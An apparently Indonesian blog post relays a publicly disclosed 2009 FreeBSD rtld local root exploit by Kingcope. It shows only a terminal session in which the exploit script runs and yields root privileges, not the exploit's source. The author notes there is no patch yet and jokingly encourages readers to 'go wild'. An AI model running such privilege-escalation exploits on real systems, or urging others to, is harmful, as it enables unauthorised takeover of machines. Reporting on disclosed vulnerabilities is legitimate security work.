Home > Tutorial > FreeBSD rtld 0day exploit

FreeBSD rtld 0day exploit

King Cope publish local exploit ini ke FD-Lists.
view sourceprint?
01.[bofh@begok ~/hack]$ uname -a
02.FreeBSD begok.xxxx.de 7.0-STABLE FreeBSD 7.0-STABLE #1: Fri Mar 27 11:24:51 WIT 2009 root@begok.xxxxx.de:/usr/obj/usr/src/sys/BEGOK i386
03.[bofh@begok ~/hack]$ ./fbsd-local-2009.sh
04.fbsd-local-2009.sh FreeBSD local r00t zeroday
05.by Kingcope
06.November 2009
07.env.c: In function ‘main’:
08.env.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’
09.env.c:9: warning: incompatible implicit declaration of built-in function ‘strcpy’
10.env.c:11: warning: incompatible implicit declaration of built-in function ‘execl’
11.8:35
12./libexec/ld-elf.so.1: environment corrupt; missing value for
13./libexec/ld-elf.so.1: environment corrupt; missing value for
14./libexec/ld-elf.so.1: environment corrupt; missing value for
15./libexec/ld-elf.so.1: environment corrupt; missing value for
16./libexec/ld-elf.so.1: environment corrupt; missing value for
17.ALEX-ALEX
18.# id
19.uid=1007(bofh) gid=1007(bofh) euid=0(root) groups=1007(bofh)

Publikasi ini jelas akan langsung dimanfaatkan dengan cepat oleh para hacker/cracker yang bisa mendapatkan akses local ke mesin-mesin FreeBSD. Rasanya belum ada patch untuk saat ini. So, go wild guys? :p.

** Thanks buat temon untuk testing exploitnya, as currently I don’t have FBSD to test. *sigh*.

sumber klik disini

  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: